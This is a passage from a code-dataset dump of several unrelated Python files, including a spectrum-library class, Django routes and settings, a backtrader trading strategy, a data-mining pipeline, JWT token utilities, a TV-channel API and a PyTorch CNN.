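# --- Editor's aside (illustrative addition, not part of the original source) ---
# A toy model of the grouped key/value semantics that this docstring and the
# ones below describe. It is an invented simplification for illustration only,
# not mzlib's actual attribute storage.
class ToyAttributeStore:
    def __init__(self):
        self._attrs = []  # list of (key, value, group_identifier) triples

    def add_attribute(self, key, value, group_identifier=None):
        self._attrs.append((key, value, group_identifier))

    def get_attribute(self, key, group_identifier=None):
        hits = [v for (k, v, g) in self._attrs
                if k == key and (group_identifier is None or g == group_identifier)]
        return hits[0] if len(hits) == 1 else hits

# Usage: s = ToyAttributeStore(); s.add_attribute("format", "msp")
#        s.get_attribute("format") -> "msp"
# --- end aside ---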
If not provided,\n            no group is assumed.\n        \"\"\"\n        self._requires_backend()\n        return self.backend.add_attribute(key, value, group_identifier=group_identifier)\n\n    def get_attribute(self, key, group_identifier=None):\n        \"\"\"Get the value or values associated with a given\n        attribute key from the library level attribute store.\n\n        Parameters\n        ----------\n        key : str\n            The name of the attribute to retrieve\n        group_identifier : str, optional\n            The specific group identifier to return from.\n\n        Returns\n        -------\n        attribute_value: object or list[object]\n            Returns single or multiple values for the requested attribute.\n        \"\"\"\n        self._requires_backend()\n        return self.backend.get_attribute(key, group_identifier=group_identifier)\n\n    def remove_attribute(self, key, group_identifier=None):\n        \"\"\"Remove the value or values associated with a given\n        attribute key from the library level attribute store.\n\n        This rebuilds the entire store, which may be expensive.\n\n        Parameters\n        ----------\n        key : str\n            The name of the attribute to remove\n        group_identifier : str, optional\n            The specific group identifier to return from.\n\n        \"\"\"\n        self._requires_backend()\n        return self.backend.remove_attribute(key, group_identifier=group_identifier)\n\n    def has_attribute(self, key):\n        \"\"\"Test for the presence of a given attribute in the library\n        level store.\n\n        Parameters\n        ----------\n        key : str\n            The attribute to test for\n\n        Returns\n        -------\n        bool\n        \"\"\"\n        self._requires_backend()\n        return self.backend.has_attribute(key)\n\n\n\n#### Example using this class\ndef example():\n\n    #### Create a new SpectrumLibrary object\n    spectrum_library = SpectrumLibrary()\n    spectrum_library.filename = \"../refData/sigmaups1_consensus_final_true_lib.msp\"\n    spectrum_library.read_header()\n\n    spectrum_buffer = spectrum_library.get_spectrum(spectrum_number=2000)\n    spectrum = Spectrum()\n    spectrum.parse(spectrum_buffer)\n    buffer = spectrum.write(format=\"text\")\n    print(buffer)\n    print()\n\n    return()\n\n\n#### If this class is run from the command line, perform a short little test to see if it is working correctly\ndef main():\n\n    #### Run an example\n    example()\n    return()\n\n\nif __name__ == \"__main__\": main()\n\n","sub_path":"mzSpecLib-master (wulong)/mzSpecLib-master/implementations/python/mzlib/spectrum_library.py","file_name":"spectrum_library.py","file_ext":"py","file_size_in_byte":9235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"442083346","text":"from django.conf.urls import url\n\nfrom anims import views\n# from ip import views\n\nurlpatterns = [\n    \n    url(r'^$', views.index, name='ip_index'),\n#     url(r'^$', views.index),\n\n    url(r'^index/$', views.index, name='ip_index'),\n    \n    # 20181010_084804\n    url(r'^anims/$', views.anims, name='anims'),\n    \n    # 20181010_120542\n    url(r'^anims_JS/$', views.anims_JS, name='anims_JS'),\n    \n    # 20181013_071822\n    url(r'^open_dir/$', views.open_dir, name='open_dir'),\n    \n]\n","sub_path":"JVEMV6/46_art/VIRTUAL/Admin_Projects/anims/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"125660171","text":"'''\nFinal version for backtesting 494 stocks with our strategy \n'''\n\n\nfrom __future__ import (absolute_import, division, print_function,unicode_literals)\n\nimport datetime \nimport os \nimport backtrader as bt \nfrom backtrader.feeds import GenericCSVData \nimport argparse\n\n# better plotting and 
results analys\nfrom backtrader_plotting import Bokeh\nimport pandas as pd\nfrom joblib import dump, load\n\n\n\n# extending orginal GenericCSVData to includes predict columns \nclass GenericCSVDataEx(GenericCSVData):\n\n lines = (('predict'),)\n params = (('predict', 71),)\n \n# creating strategy\nmaximum_holding = 5\nclass DPStrategy(bt.Strategy):\n params = (\n ('trailpercent', 0.05),\n )\n\n def __init__(self):\n # create list to store position\n self.hold_stocks = []\n self.log_data = []\n self.orders = {}\n \n def log(self, txt, dt=None):\n ''' logging function'''\n dt = dt or self.datas[0].datetime.date(0)\n print('%s, %s' % (dt.isoformat(), txt))\n self.log_data.append(f'{dt.isoformat()} {txt}')\n \n def notify_order(self, order):\n if order.status in [bt.Order.Completed]:\n if order.isbuy():\n print(': BUY {} EXECUTED, Price: {:.2f}'.format( order.data._name, order.executed.price))\n else: # Sell\n self.orders.pop(order.data._name)\n self.hold_stocks.remove(order.data._name)\n self.log(': SELL {} EXECUTED, Price: {:.2f}'.format( order.data._name, order.executed.price))\n # print('{}: SELL {} EXECUTED, Price: {:.2f}'.format(\n # self.datetime.date(), order.data._name, order.executed.price))\n elif order.status in [bt.Order.Rejected, bt.Order.Margin, bt.Order.Cancelled, bt.Order.Expired]:\n if order.data._name in self.hold_stocks:\n self.hold_stocks.remove(order.data._name)\n self.log(': order {} Failed!'.format(order.data._name))\n # print('{}: order {} failed!'.format(self.datetime.date(), order.data._name))\n\n def notify_trade(self, trade):\n if not trade.isclosed:\n return\n self.log(': TRADING {} OPERATION PROFIT, GROSS {:.2f}, NET {:.2f}'.format(\n trade.data._name, trade.pnl, trade.pnlcomm))\n #print('{}: TRADING {} OPERATION PROFIT, GROSS {:.2f}, NET {:.2f}'.format(\n #self.datetime.date(), trade.data._name, trade.pnl, trade.pnlcomm))\n \n def next(self):\n # print current postion situation\n self.log(f': Position: {self.hold_stocks}')\n # check if stock has been in selling order \n for stk in self.hold_stocks:\n \n if stk not in self.orders:\n print(self.getdatabyname(stk)._name)\n self.orders[stk] = self.close(data = self.getdatabyname(stk),\n exectype = bt.Order.StopTrail, trailpercent = self.p.trailpercent)\n\n if len(self.hold_stocks) < maximum_holding:\n buy_dict = {}\n # searching for the highest trading volume to buy\n for i, d in enumerate(self.datas):\n if d._name not in self.hold_stocks:\n buy_dict[d] = self.datas[i].volume[0]\n buy_dict = sorted(buy_dict.items(), key = lambda x : x[1], reverse = True)\n for d in buy_dict:\n if (d[0]._name in self.hold_stocks) & (d[0].predict == 1):\n continue\n \n # Set the buying share for each order\n stake = int(self.broker.cash / (maximum_holding - len(self.hold_stocks)) // (d[0].close[0])) \n # stake = 100\n self.buy(data = d[0], size = stake)\n self.hold_stocks.append(d[0]._name)\n if len(self.hold_stocks) >= maximum_holding:\n break\n \n def stop(self):\n with open('resluts_log.txt', 'w') as e:\n for line in self.log_data:\n e.write(line + '\\n')\n\n\n#backtesting\nif __name__ == '__main__':\n #* Getting stock list \n # getting currecnt working dirctory\n cwd = os.getcwd()\n path = cwd + '/TPData1'\n\n stocklist = []\n for filename in os.listdir(path):\n if filename.endswith('.csv'):\n stocklist.append(filename[3:-4])\n print(f'There are {len(stocklist)} stocks in S&P500 \\n')\n\n cerebro = bt.Cerebro(stdstats=False)\n # adding strategy\n cerebro.addstrategy(DPStrategy)\n \n for stock in stocklist:\n datapath = cwd + 
f'/BTData1/bt_{stock}' +'.csv'\n # adding stock price data into backtesting system\n data = GenericCSVDataEx(\n dataname = datapath,\n fromdate = datetime.datetime(2020, 1, 1),\n todate = datetime.datetime(2021, 2, 20),\n #todate = datetime.datetime(2018, 1, 15),\n nullvalue = 0.0,\n dtformat = ('%Y-%m-%d'),\n datetime = 0,\n open = 1,\n high = 2,\n low = 3,\n close = 4,\n volume = 5,\n openinterest = -1,\n predict = 71,\n ma5 = 6\n )\n \n cerebro.adddata(data, name = stock)\n \n # set principle \n cerebro.broker.setcash(100000.0)\n # set commission \n cerebro.broker.setcommission(commission=0.00025)\n # Add analyzer\n cerebro.addanalyzer(bt.analyzers.SharpeRatio, _name = 'SharpeRatio')\n cerebro.addanalyzer(bt.analyzers.DrawDown, _name='DW')\n \n \n # print out starting capital \n print('Starting Portfolio Value: %.2f' % cerebro.broker.getvalue())\n # start backtesting \n results = cerebro.run()\n \n strat = results[0]\n print('Final Portfolio Value: %.2f' % cerebro.broker.getvalue())\n print('SR:', strat.analyzers.SharpeRatio.get_analysis())\n print('DW:', strat.analyzers.DW.get_analysis())\n\n # plot\n # cerebro.plot()\n #b = Bokeh(style='bar')\n #cerebro.plot(b)\n \n # print out final capital \n print('Final Portfolio Value: %.2f' % cerebro.broker.getvalue())\n print(f'return_rate: {round(cerebro.broker.getvalue()/100000 -1,4)*100}%')\n \n\n","sub_path":"7MTP_BacktestV3.py","file_name":"7MTP_BacktestV3.py","file_ext":"py","file_size_in_byte":6204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"469038246","text":"\n__author__ = [\"Candy Espulgar\"]\n__copyright__ = \"Copyright 2019 - TE3D House, Copyright 2020 - Liverpool Hope University\"\n__credits__ = [\"Arnulfo Azcarraga, Neil Buckley\"]\n__version__ = \"3.0\"\n\n'''\n This script contains all calls to the various Automated Mining\n Modules. 
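# --- Editor's aside (illustrative addition, not part of the original source) ---
# Each module wrapper in this script follows the same pattern: take
# time.time() before the call, compute the elapsed time afterwards, and log
# it. A compact sketch of that pattern as a decorator; `timed` and
# `example_module` are hypothetical names introduced only for illustration.
import functools
import time

def timed(fn):
    @functools.wraps(fn)
    def wrapper(*args, **kwargs):
        start = time.time()
        result = fn(*args, **kwargs)
        print("%s took %.3f seconds" % (fn.__name__, time.time() - start))
        return result
    return wrapper

@timed
def example_module():
    time.sleep(0.01)  # stand-in for real module work

# Usage: example_module() prints something like "example_module took 0.010 seconds"
# --- end aside ---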
It is also the script that is called when the Run button\n is clicked in the AM tab.\n [Candy]\n'''\n\nimport os\nimport time\n# Uploader support for converting read dataset\nimport __Loader_support as LS\nimport __RFE_support as RFES\nimport __Filter_support as FILS\nimport __CrossProcess_support as CPS\nimport __CrossProcess_MP_support as CMPS\nimport __Depth_support as DS\nimport _UIConstants_support as UICS\nimport _AMVariables_support as AMVS\n\n\ndef loaderModule():\n start_time = time.time()\n\n df_raw_dataset, df_dataset, ftr_names, pd_raw_dataset, frequency_count = LS.loadInput() # Can add parameters\n\n # Record run time\n module_time = (time.time() - start_time)\n\n # Update singleton frequency\n AMVS.getSingleton().updateFrequency_LoaderModule(frequency_count, module_time)\n\n return df_raw_dataset, df_dataset, ftr_names, pd_raw_dataset\n\ndef rfeModule(df_raw_dataset, ftr_names, pd_raw_dataset, controller):\n controller.updateModuleProgress(0, UICS.FIRST_MESSAGE_SPACE + \"[ Starting Automated OOTO Miner] \") # 1\n # time.sleep(1)\n\n dict_rfe = RFES.performRFE(df_raw_dataset, ftr_names, pd_raw_dataset, controller)\n return dict_rfe\n\ndef filterModule(dict_context, controller):\n\n i = 1\n print(\"Context Features:\")\n text = \"Context Features:\"\n controller.getAMController().addToConsoleAll(text + \"\\n\")\n for key, value in dict_context.items():\n text = \"CF\" + str(i) + \" - \" + str(value)\n print(text)\n i = i + 1\n controller.getAMController().addToConsoleAll(text + \"\\n\")\n controller.getAMController().addToConsoleInput(text + \"\\n\")\n\n\n start_time = time.time()\n\n # Takes the dictionary and converts it to the correct format for Crossing (e.g. [\"b5:a\", \"b5:b\"])\n extracted_cross_filters, frequency_count = FILS.extractCrossFilters(dict_context, controller)\n\n # NOTE: CROSS is the collection of SSFs\n CROSS, frequency_count = FILS.processLVLs(extracted_cross_filters) # Returns the filter list for each level\n\n # Record run time\n module_time = (time.time() - start_time)\n\n # Update singleton frequency\n AMVS.getSingleton().updateFrequency_FilterModule(frequency_count, module_time)\n\n return CROSS\n\n\ndef crossProcessModule(df_dataset, np_CROSS, depth, controller):\n start_time = time.time()\n\n dict_significant_results, frequency_count, highest_process_frequency = CMPS.crossProcessOptimized(df_dataset, np_CROSS, depth, controller)\n\n # Record run time\n module_time = (time.time() - start_time)\n\n # Update singleton frequency\n AMVS.getSingleton().updateFrequency_CrossProcessModule(frequency_count, highest_process_frequency, module_time)\n\n return dict_significant_results\n\n\n\n\ndef runAutomatedMining(controller):\n\n text = \"RUNNING Automated Mining\\n\" # Show start message in console\n controller.getAMController().addToConsoleAll(text + \"\\n\")\n\n text = \"MAX CROSS: \" + str(UICS.MAX_CROSS) # Show MAX CROSS in console and input\n controller.getAMController().addToConsoleAll(text + \"\\n\")\n controller.getAMController().addToConsoleInput(text + \"\\n\")\n\n text = \"MAX LEVEL: \" + str(UICS.MAX_LEVEL) + \"\\n\" # Show MAX LEVEL in console and input\n controller.getAMController().addToConsoleAll(text + \"\\n\")\n controller.getAMController().addToConsoleInput(text + \"\\n\")\n\n df_raw_dataset, df_dataset, ftr_names, pd_raw_dataset = loaderModule()\n\n # Run STATIC depth mining (Loops based on MAX DEPTH)\n # dict_significant_results = runStaticDepthMining(df_raw_dataset, df_dataset, ftr_names, controller)\n\n # Depth mining that continues on 
until the p-value stops updating\n dict_significant_results = runMobileDepthMining(df_raw_dataset, df_dataset, ftr_names, pd_raw_dataset, controller)\n\n controller.isAMFinished() # Enables the Check button (Call on completion of the last iteration)\n print(\"Automated Mining Finished...\")\n\n str_depths = str(AMVS.getSingleton().getDepths())\n controller.getAMController().addToConsoleAll(\"\\nTotal Depth: \" + str_depths)\n print(\"Total Depth \" + str_depths)\n\n str_run_time = str(AMVS.getSingleton().getTime())\n controller.getAMController().addToConsoleAll(\"\\nAM Run time:\\n\" + str_run_time + \" seconds\\n\")\n print(\"Mining Run Time: \" + str_run_time + \" seconds\")\n\n AMVS.getSingleton().resetSingleton()\n return dict_significant_results\n\n\n\n'''\n Mine data according to the p-value.\n The miner continues until p-value stops updating.\n'''\ndef runMobileDepthMining(df_raw_dataset, df_dataset, ftr_names, pd_raw_dataset, controller):\n singleton = AMVS.getSingleton() # A Singleton class is used\n dict_significant_results = None\n isUpdating = True\n hasPrevSSFs = True\n i_depth = 0\n\n while isUpdating: # Keep looping until the stop criteria are met\n curr_depth = i_depth + 1\n singleton.resetCtrAccepted()\n\n print(\"Starting DEPTH: \" + str(curr_depth))\n # Select SSFs, if first iteration, use RFE, else load the generated SSFs of the previous depth\n if i_depth == 0:\n print(\"Loading SEED SSFs...\")\n # dict_ranked_features = rfeModule(df_raw_dataset, ftr_names, controller)\n dict_ranked_features = UICS.SEED_SSFS\n AMVS.getSingleton().updateDictSSFs(dict_ranked_features, curr_depth)\n print(\"-- Successfully Loaded SEED SSFs --\")\n\n print(\"Extracting RFE Features\")\n # rfe_features = rfeModule(df_raw_dataset, ftr_names, pd_raw_dataset, controller)\n # print(\"-- Successfully Determined RFE Features --\")\n # print(rfe_features)\n print(\"\")\n\n else:\n print(\"Extracting SSFs from Previous Depth [\" + str(i_depth) + \"]...\")\n # Load the previous SSFs and consolidate. 
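# --- Editor's aside (illustrative addition, not part of the original source) ---
# The while-loop above keeps mining until its stop criteria fire (repeated
# SSFs, or no newly accepted values). A compact sketch of the same
# "stop once the metric stops improving" idea with a patience counter;
# all names here are invented for illustration.
def mine_until_stale(next_score, patience=3, max_rounds=100):
    best, stale, round_no = float("inf"), 0, 0
    while round_no < max_rounds and stale < patience:
        score = next_score(round_no)
        if score < best:
            best, stale = score, 0
        else:
            stale += 1
        round_no += 1
    return best, round_no

# Usage: mine_until_stale(lambda r: max(0.5, 1.0 - 0.1 * r)) keeps going while
# the score improves and stops after it plateaus for `patience` rounds.
# --- end aside ---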
The current depth\n # indicates the PREVIOUS SSF folder.\n df_SSFs = DS.loadPreviousSSFs(i_depth)\n print(\"df_SSFs\")\n print(df_SSFs)\n\n\n if df_SSFs is None: # If there were no previously loaded SSFs, stop updating TODO: check if this can be determined earlier\n hasPrevSSFs = False\n isUpdating = False\n dict_ranked_features = None\n print(\"-- Failed to Locate Previous SSFs --\")\n else:\n # Partition the extracted SSFs to 3 Ranks\n dict_new_ranked_features = DS.rankSSFs(df_SSFs)\n # Merge the new SSFs with the old SSFs\n AMVS.getSingleton().updateDictSSFs(dict_new_ranked_features, curr_depth)\n print(\"RANK\")\n dict_ranked_features = AMVS.getSingleton().getDictSSFs()\n print(dict_ranked_features)\n print(\"-- Successfully Extracted Previous SSFs --\")\n\n if hasPrevSSFs:\n print(\"Starting Filtering...\")\n np_cross = filterModule(dict_ranked_features, controller)\n print(\"-- Filtering Finished --\")\n print(\"\")\n\n print(\"Starting Cross Process...\")\n dict_significant_results = crossProcessModule(df_dataset, np_cross, curr_depth, controller)\n print(\"-- Cross Process Finished --\")\n\n\n list_SSFs = getSSFsList(dict_ranked_features)\n print(list_SSFs)\n # if isConstantSSFs(list_SSFs): # Stop mining if the current list of SSFs have been parsed before\n if singleton.isConstantSSFs(list_SSFs): # Stop mining if the current list of SSFs have been parsed before\n isUpdating = False\n elif singleton.getCtrAccepted() == 0: # Mark mining as finished when there are no more accepted values\n isUpdating = False\n\n print(singleton.getCtrAccepted())\n\n i_depth = i_depth + 1\n\n singleton.updateFrequencyCountsText(curr_depth)\n\n singleton.setDepths(i_depth - 1) # Log total number of depths\n singleton.printAllTextData()\n\n return dict_significant_results\n\n\n'''\n Converts the values in the SSFs dictionary to a list.\n'''\ndef getSSFsList(dict_SSFs):\n list_SSFs = []\n\n for key, value in dict_SSFs.items():\n list_SSFs.append(value)\n\n return list_SSFs\n\n'''\n This function checks if the SSFs have been parsed\n before. 
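# --- Editor's aside (illustrative addition, not part of the original source) ---
# The containment test used by isListsMatch below is quadratic, because each
# `in` probe scans a list. For hashable items the same check can be written
# with sets in roughly linear time (`is_subset` is a hypothetical helper):
def is_subset(list1, list2):
    # True when every element of list2 also occurs in list1;
    # ignores multiplicity, exactly like all(item in list1 for item in list2)
    return set(list2) <= set(list1)

# is_subset([1, 2, 3], [2, 3]) -> True
# is_subset([1, 2, 3], [4])    -> False
# --- end aside ---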
If so, it returns True.\n'''\ndef isConstantSSFs(list_currSSFs):\n singleton = AMVS.getSingleton()\n llist_prevSSFs = singleton.getLlSSFs() # Get the list of all parsed SSFs (from all depths) via the Singleton class\n state = False\n\n for SSFs in llist_prevSSFs:\n # Check if all items in the current SSFs list are contained\n # in any previously parsed SSFs list\n state = isListsMatch(SSFs, list_currSSFs)\n if state: # If there's a match, stop looping and return 'state'\n break\n\n return state\n\n\n'''\n This function checks if all items in list2 are in list1.\n'''\ndef isListsMatch(list1, list2):\n\n # len_list1 = len(list1)\n # len_list2 = len(list2)\n\n # if len_list1 > len_list2:\n # list_A = list1\n # list_B = list2\n # else:\n # list_A = list2\n # list_B = list1\n\n # Checks if all elements of list2 is in list1\n isMatch = all(item in list1 for item in list2)\n\n return isMatch\n\n\n\n'''\n Mine data according to the value of MAX DEPTH.\n MAX DEPTH is declared in the UICS script.\n'''\ndef runStaticDepthMining(df_raw_dataset, df_dataset, ftr_names, pd_raw_dataset, controller):\n depth = UICS.MAX_DEPTH\n start_depth = UICS.getStartDepth() # Getting it this way will subtract 1 from the value, to be used as an index\n dict_significant_results = None\n\n for i_depth in range(start_depth, depth): # TODO: Fix this so that it will stop according to the change in p-value\n curr_depth = i_depth + 1\n\n print(\"Starting DEPTH: \" + str(curr_depth) + \" of \" + str(depth))\n # Select SSFs, if first iteration, use RFE, else load the generated SSFs of the previous depth\n if i_depth == 0:\n print(\"Starting RFE...\")\n dict_ranked_features = rfeModule(df_raw_dataset, ftr_names, pd_raw_dataset, controller)\n print(\"-- RFE Finished --\")\n print(\"\")\n\n else:\n print(\"Extracting SSFs from Previous Depth [\" + str(i_depth) + \"]...\")\n # Load the previous SSFs and consolidate. 
The current depth\n # indicates the PREVIOUS SSF folder.\n df_SSFs = DS.loadPreviousSSFs(i_depth)\n # Partition the extracted SSFs to 3 Ranks\n dict_ranked_features = DS.rankSSFs(df_SSFs)\n print(\"-- Successfully Extracted Previous SSFs --\")\n\n\n print(\"Starting Filtering...\")\n np_cross = filterModule(dict_ranked_features, controller)\n print(\"-- Filtering Finished --\")\n print(\"\")\n\n print(\"Starting Cross Process...\")\n dict_significant_results = crossProcessModule(df_dataset, np_cross, curr_depth, controller)\n print(\"-- Cross Process Finished --\")\n\n return dict_significant_results\n\n\n\n\n","sub_path":"AutomatedMining_RUN.py","file_name":"AutomatedMining_RUN.py","file_ext":"py","file_size_in_byte":11252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"191080265","text":"\"\"\"\nutils\n~~~~~~~~~~\nVarious utilities for nextcode-sdk functionality.\n\"\"\"\n\nimport jwt\nimport logging\nfrom urllib.parse import urlsplit\nimport requests\nfrom requests import codes\n\nfrom .exceptions import ServerError, InvalidToken\n\nlog = logging.getLogger(__name__)\n\n\ndef decode_token(token):\n try:\n decoded_token = jwt.decode(token, algorithms=[\"RS256\"], verify=False)\n return decoded_token\n except (KeyError, jwt.InvalidTokenError):\n raise InvalidToken(\"Token could not be decoded\")\n\n\ndef check_resp_error(resp):\n response_json = None\n try:\n resp.raise_for_status()\n except Exception:\n desc = resp.text\n try:\n response_json = resp.json()\n desc = response_json[\"error\"][\"description\"]\n log.info(response_json)\n if \"errors\" in response_json[\"error\"]:\n desc += \" (%s)\" % (response_json[\"error\"][\"errors\"])\n except Exception:\n pass\n if not desc:\n desc = \"Status code %s received (%s)\" % (resp.status_code, resp.text)\n else:\n desc += \" (code %s)\" % resp.status_code\n if resp.status_code >= 500:\n desc = \"Server error in call to %s\" % resp.url\n desc += \" - Response headers: %s\" % resp.headers\n desc += \" - Response body: %s\" % resp.text\n log.error(desc)\n else:\n log.info(\"Server error in call to %s\", resp.url)\n\n error = ServerError(desc, url=resp.url, response=response_json)\n raise error from None\n\n\ndef root_url_from_api_key(api_key):\n payload = decode_token(api_key)\n parts = urlsplit(payload[\"iss\"])\n root_url = \"{scheme}://{netloc}\".format(scheme=parts.scheme, netloc=parts.netloc)\n return root_url\n\n\ndef get_access_token(api_key):\n \"\"\"\n \"\"\"\n payload = decode_token(api_key)\n client_id = payload[\"azp\"]\n body = {\n \"grant_type\": \"refresh_token\",\n \"client_id\": client_id,\n \"refresh_token\": api_key,\n \"username\": \"dummy_user\",\n }\n headers = {\"Content-Type\": \"application/x-www-form-urlencoded\"}\n token_endpoint = \"{}/protocol/openid-connect/token\".format(payload[\"iss\"])\n\n # Call the auth server\n log.info(\"Authenticating with %s\", token_endpoint)\n response = requests.post(token_endpoint, data=body, headers=headers)\n if (\n response.status_code == codes.bad_request\n and \"Refresh token expired\" in response.text\n ):\n raise InvalidToken(\"Refresh token has expired\")\n elif response.status_code >= codes.bad_request:\n try:\n if response.json():\n raise InvalidToken(response.json().get(\"error_description\"))\n except Exception:\n pass\n\n try:\n response.raise_for_status()\n except Exception:\n log.error(\"Body: %s\" % body)\n raise InvalidToken(\n \"Error authenticating with %s: %s\" % (token_endpoint, response.text)\n )\n\n return 
response.json()[\"access_token\"]\n","sub_path":"nextcode/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"540703469","text":"# Copyright (c) 2011, Scott Ferguson\n# All rights reserved.\n# \n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# * Neither the name of the software nor the\n# names of its contributors may be used to endorse or promote products\n# derived from this software without specific prior written permission.\n# \n# THIS SOFTWARE IS PROVIDED BY SCOTT FERGUSON ''AS IS'' AND ANY\n# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL SCOTT FERGUSON BE LIABLE FOR ANY\n# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nfrom djangoappengine.settings_base import *\n\nimport os\n\nSECRET_KEY = '=r-$b*8hgw3sc58&9t0twan5ch1k-3d3vfc4(wk0rn3wa1dhvi'\n\nDEBUG = True\n\nINSTALLED_APPS = (\n 'djangoappengine',\n 'djangotoolbox',\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'console',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n)\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n 'django.contrib.auth.context_processors.auth',\n 'django.core.context_processors.request',\n)\n\nLOGIN_REDIRECT_URL = '/'\n\nADMIN_MEDIA_PREFIX = '/media/admin/'\nMEDIA_ROOT = os.path.join(os.path.dirname(__file__), 'media')\nTEMPLATE_DIRS = (os.path.join(os.path.dirname(__file__), 'templates'),)\n\nROOT_URLCONF = 'urls'\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"373973064","text":"import datetime\n\nfrom ntv.shortcuts import search as search_channels\n\nfrom .webapi import api\n\n\nroot = api.resource('/')\nchannel_collection = api.resource('channels')\nchannel = api.resource('channels/:id')\n\n\n@root.get()\ndef view_root(ctx):\n return ctx.Response({\n '@context': {\n 'schema': 'http://schema.org/',\n 'Collection': 'schema:Collection'\n },\n 'collections': [\n {\n '@id': ctx.url_for(channel_collection),\n '@type': 'Collection',\n 'description': ''\n }\n ]\n })\n\n\n@channel_collection.get()\ndef view_channels(ctx):\n \"\"\"\n Channels query logic\n \"\"\"\n\n date = datetime.date.today()\n query = {}\n if 'name' in ctx.parameters:\n query['channel_name'] = ctx.parameters['name'].strip()\n return 
ctx.Response(search_channels(date, **query).values())\n\n\n@channel.get()\ndef view_channel_details(ctx, id):\n date = datetime.date.today()\n id = int(id)\n try:\n obj = search_channels(date, channel_id=id)[id]\n except IndexError:\n return ctx.NotFound()\n else:\n return ctx.Response(obj)\n\n\n@channel_collection.representation()\ndef dump_channel_collection(channels, ctx):\n \"\"\"\n Channels collection representation\n \"\"\"\n\n return {\n '@context': {\n 'schema': 'http://schema.org/',\n 'Collection': 'schema:Collection'\n },\n '@id': ctx.url_for(channel_collection),\n '@type': 'Collection',\n 'potentialAction': [\n {\n '@type': 'SearchAction',\n 'target': '{}/?name={name}',\n 'query-input': 'required name=name',\n },\n ],\n 'channels': [{\n '@id': ctx.url_for(channel, id=x['id']),\n '@type': 'Channel',\n 'name': x['name'],\n } for x in channels\n ],\n }\n\n\n@channel.representation()\ndef dump_channel_detail(obj, ctx):\n return {\n '@context': {\n 'schema': 'http://schema.org/',\n 'Channel': 'schema:TelevisionChannel'\n },\n '@type': 'Channel',\n '@id': ctx.url_for(channel, id=obj['id']),\n 'potentialAction': [\n {\n '@type': 'SearchAction',\n 'target': '{}/?date={date}',\n 'query-input': 'required name=date',\n },\n {\n '@type': 'SearchAction',\n 'target': '{}/?movie={title}',\n 'query-input': 'required name=title',\n },\n ],\n 'name': obj['name'],\n 'movies': [{\n 'title': m.get('title'),\n 'start_time': str(m.get('start_time')),\n 'end_time': str(m.get('end_time')),\n } for m in obj['movies']],\n }\n","sub_path":"ntv/api/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":2804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"328010310","text":"import numpy as np\nimport pickle\nimport torch\nimport torch.nn as nn\nimport torchvision.transforms as transforms\nfrom torch.utils.data import DataLoader, Dataset\n\n\ndef unpickle(file):\n with open(file, 'rb') as fo:\n data_dict = pickle.load(fo, encoding='bytes')\n return data_dict\n\n\ndef eval_acc(pred, true_label):\n pred_label = torch.argmax(pred, dim=1)\n return torch.sum(pred_label == true_label)\n\n\nclass ImgDataset(Dataset):\n\n def __init__(self, x, y, transform, device='cpu'):\n self.x = x\n self.y = torch.LongTensor(y)\n self.transform = transform\n self.device = device\n\n def __len__(self):\n return len(self.x)\n\n def __getitem__(self, index):\n return self.transform(self.x[index]).to(self.device), self.y[index].to(self.device)\n\n\nclass MY_MODULE(nn.Module):\n\n def __init__(self):\n super(MY_MODULE, self).__init__()\n # input [32, 32]\n self.layers = nn.Sequential(\n nn.Conv2d(3, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False), # [32, 32]\n nn.BatchNorm2d(64, eps=1e-05, momentum=0.1), # [32, 32]\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2, stride=2, padding=0, dilation=1), # [16, 16]\n\n nn.Conv2d(64, 128, kernel_size=(1, 1), stride=(1, 1), bias=False),\n nn.BatchNorm2d(128, eps=1e-05, momentum=0.1),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2, stride=2, padding=0, dilation=1), # [8, 8]\n\n nn.Conv2d(128, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False), # [8, 8]\n nn.BatchNorm2d(256, eps=1e-05, momentum=0.1), # [8, 8]\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2, stride=2, padding=0, dilation=1), # 